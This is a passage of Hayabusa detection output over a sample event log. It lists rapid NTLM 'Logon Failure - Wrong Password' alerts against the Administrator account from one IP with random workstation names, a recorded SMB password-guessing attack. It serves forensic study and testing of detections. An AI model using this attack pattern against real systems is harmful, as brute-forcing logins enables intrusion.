NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:08.611 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NhNdf5lHfrHKSCXq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.646 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xg05F6tdf3kR9kdP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 70rRbaC6L6SzT15q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.735 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HnJyN8wF21ff2L1e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MUZHZJMQznj6GBqg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: P9h52ZKMbXLuFvUV : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.839 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n95RJvcQnFrAG2iX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xI23nmysFlr1pvVf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nVsjcTxDdZbzkmMx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.955 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mMuWatQuNBh9UKdR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BfC3JZ3awqFDNQbm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:09.028 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 337h8PHN6Axi0iaY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qGQpWOuzgETfxTgJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oFjlyMAJMI2zIC8w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7exAVz3PlzJQ6Wcw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.183 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RuYihjQpt76foAW3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.219 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OlPm2vRh9EHN9J6n : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.255 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n9jDy3NDDPe7XgyW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.291 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AtGxqEKOoP6W3w0Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BLqYztXwV80UBez1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C0yki1dEFZrnMLs2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jbE2z1W1wQgoTDso : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:09.455 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IJmZFXFxiLuWWkMC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x9EPwprgXSJNUFfg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h0ZjYxZ8K5m5F1vo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.587 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xSw7OjDv8ldqbm5T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.631 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mk0BAdOI210HwPhX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wSwWz57Kvl2XJVUR : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DLcfSrHT5bSsNnuQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rQDkbESps0PXWEUT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZpnyzkXasuyAtdn1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ps9IqJzTliJvzpIS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V7PLb2uRTIY8t123 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:09.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sHAJ9p0QbSRxhvtk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YRiE1wGrwWAx0feP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Flo4bCVjmlaHz0QS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.061 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HscUujSzd3Ua7dqg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aIQPTx67aEer51wb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.191 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MqUoXUf7PKIaoDjs : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.222 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wzeB4DAS1W633tmh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.263 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UTtXTrqHoCZMbDLT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.311 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4HVv5PgPhiDW3qcj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g21VoO45UrIbTuZO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.383 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rGpD7AJUTekDmd6Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:10.423 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OykzTOn7B9THv0cT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cIYOrBBwX8nFpCzw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SvnROHLMVnmPfAyy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5EwJ84H7kXQXzGZz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 34RLeLWDgLayU3JM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QaXHGUgboODAi5Qu : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.659 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QlOlZ0m397CsmaeD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.699 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N24rSPCI8DsQIPXR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.738 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5y2tgoUcs6mFPZm4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HmFX6MioYqaMumgw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.820 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R4HRWlPWPKy1Cicq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:10.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GDUf7wVbHkS9uaPC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eBX0Lviz6Bv5rGcb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zZwPm9qahLU78FRY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jOVsopykTHNQcYUp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n8DY7sdDY8nuWdME : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.105 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rTxEVu7mudXEBARZ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7ohqvCoOLkFRcqvE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: me8rikVJqcKxvHdq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oLqVmqCmHTrD7V8V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ySdyzxvDasHgjq0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.312 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N2auwOc1wemq76n1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:11.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RgK6lHgC5WOBk4kW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2GG0bKgusKqseQij : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MpHm7DcOmhq4rkaX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OX1vVGrE7fJSMEiZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 65i7wtyAhL58QrzC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.551 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k8uSVFRTLTB6g1eg : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ire6VOUMWZQnNjES : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pGWnvKUXnbJvRqql : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xBVvrrLf1rnAviKS : IP Address: 192.168.198.149 : AuthPackage: 